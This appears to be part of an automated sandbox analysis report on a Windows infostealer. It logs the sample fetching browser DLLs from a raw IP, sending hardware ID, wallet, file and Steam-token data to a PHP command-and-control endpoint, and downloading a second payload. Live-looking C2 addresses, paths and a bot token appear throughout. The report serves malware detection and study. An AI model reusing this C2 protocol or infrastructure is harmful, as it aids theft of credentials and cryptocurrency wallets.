Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/mozglue.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/msvcp140.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/nss3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/softokn3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/vcruntime140.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDAAFBGDBKJJJKFIIIJHost: 185.172.128.111Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHIDHost: 185.172.128.111Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 62 35 61 62 31 65 35 62 32 33 35 31 38 33 33 32 36 39 30 64 66 38 36 31 63 62 30 33 38 39 39 33 39 33 64 63 66 65 39 35 39 37 64 30 31 65 62 35 38 34 39 30 39 35 65 39 37 62 38 39 61 61 62 39 34 66 66 63 35 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"61b5ab1e5b23518332690df861cb03899393dcfe9597d01eb5849095e97b89aab94ffc51------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="message"wallets------GHJKJDAKEHJDGDGDGHID--
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECAHost: 185.172.128.111Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 62 35 61 62 31 65 35 62 32 33 35 31 38 33 33 32 36 39 30 64 66 38 36 31 63 62 30 33 38 39 39 33 39 33 64 63 66 65 39 35 39 37 64 30 31 65 62 35 38 34 39 30 39 35 65 39 37 62 38 39 61 61 62 39 34 66 66 63 35 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 2d 2d 0d 0a Data Ascii: ------IJECBGIJDGCAEBFIIECAContent-Disposition: form-data; name="token"61b5ab1e5b23518332690df861cb03899393dcfe9597d01eb5849095e97b89aab94ffc51------IJECBGIJDGCAEBFIIECAContent-Disposition: form-data; name="message"files------IJECBGIJDGCAEBFIIECA--
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGCGDHJEGHJKFHJJJKJHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJDHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEBHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFHDAKECFIDGDGDBKJDHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEBHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIEBGCAAECBGCBGCBKHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKJDBAAKJDGCBFHCFCGHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECAHost: 185.172.128.111Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHCGCAEBFIJKFIDBGHDHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKFBAAAFHJEBFIEGIDHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEBGDAFHJEBGDGIJDHHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAFHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECAHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAFIEHIEGDHIDGDGHHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 185.172.128.111Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGCHost: 185.172.128.111Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 62 35 61 62 31 65 35 62 32 33 35 31 38 33 33 32 36 39 30 64 66 38 36 31 63 62 30 33 38 39 39 33 39 33 64 63 66 65 39 35 39 37 64 30 31 65 62 35 38 34 39 30 39 35 65 39 37 62 38 39 61 61 62 39 34 66 66 63 35 31 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 4a 4a 4b 4b 46 48 49 45 48 4a 4b 45 43 47 43 47 43 2d 2d 0d 0a Data Ascii: ------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="token"61b5ab1e5b23518332690df861cb03899393dcfe9597d01eb5849095e97b89aab94ffc51------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FIIJJKKFHIEHJKECGCGCContent-Disposition: form-data; name="file"------FIIJJKKFHIEHJKECGCGC--
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.172.128.111Content-Length: 114959Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAFHost: 185.172.128.111Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 62 35 61 62 31 65 35 62 32 33 35 31 38 33 33 32 36 39 30 64 66 38 36 31 63 62 30 33 38 39 39 33 39 33 64 63 66 65 39 35 39 37 64 30 31 65 62 35 38 34 39 30 39 35 65 39 37 62 38 39 61 61 62 39 34 66 66 63 35 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 38 34 68 38 65 34 72 68 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 2d 2d 0d 0a Data Ascii: ------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="token"61b5ab1e5b23518332690df861cb03899393dcfe9597d01eb5849095e97b89aab94ffc51------CFBFCGIDAKECGCBGDBAFContent-Disposition: form-data; name="message"84h8e4rh------CFBFCGIDAKECGCBGDBAF--
Source: global traffic HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 185.172.128.203 185.172.128.203
Source: Joe Sandbox View IP Address: 185.172.128.203 185.172.128.203
Source: Joe Sandbox View IP Address: 185.172.128.111 185.172.128.111
Source: Joe Sandbox View ASN Name: NADYMSS-ASRU NADYMSS-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: unknown TCP traffic detected without corresponding DNS query: 185.172.128.111
Source: C:\Users\user\Desktop\YEnIrzZUUw.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/sqlite3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/freebl3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/mozglue.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/msvcp140.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/nss3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/softokn3.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8e6d9db21fb63946/vcruntime140.dll HTTP/1.1Host: 185.172.128.111Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
Source: unknown HTTP traffic detected: POST /f993692117a3fda2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 185.172.128.111Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 41 35 34 35 39 44 37 46 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="hwid"D5A5459D7F6E2371543510------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="build"default10------BFHJECAAAFHIJKFIJEGC--
Source: YEnIrzZUUw.exe, 00000000.00000002.2245920010.00000000041DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/freebl3.dllT_
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/freebl3.dllX
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/mozglue.dll
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/mozglue.dllb
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/msvcp140.dll
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/nss3.dll
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/softokn3.dll
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/sqlite3.dll
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/sqlite3.dlll_
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/vcruntime140.dll
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004239000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/8e6d9db21fb63946/vcruntime140.dll$X
Source: YEnIrzZUUw.exe, 00000000.00000002.2262439764.000000002A6B1000.00000004.00000020.00020000.00000000.sdmp, YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.172.128.111/f993692117a3fda2.php
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/f993692117a3fda2.php5
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.00000000041FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpDC
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.00000000041FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpL
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phpd01eb5849095e97b89aab94ffc51release
Source: YEnIrzZUUw.exe, 00000000.00000002.2246016069.0000000004255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111/f993692117a3fda2.phprofiles
Source: YEnIrzZUUw.exe, 00000000.00000002.2245920010.00000000041DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.172.128.111D
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.172.128.203/tiktok.exe
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.172.128.203/tiktok.exe00
Source: YEnIrzZUUw.exe, 00000000.00000002.2243889460.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
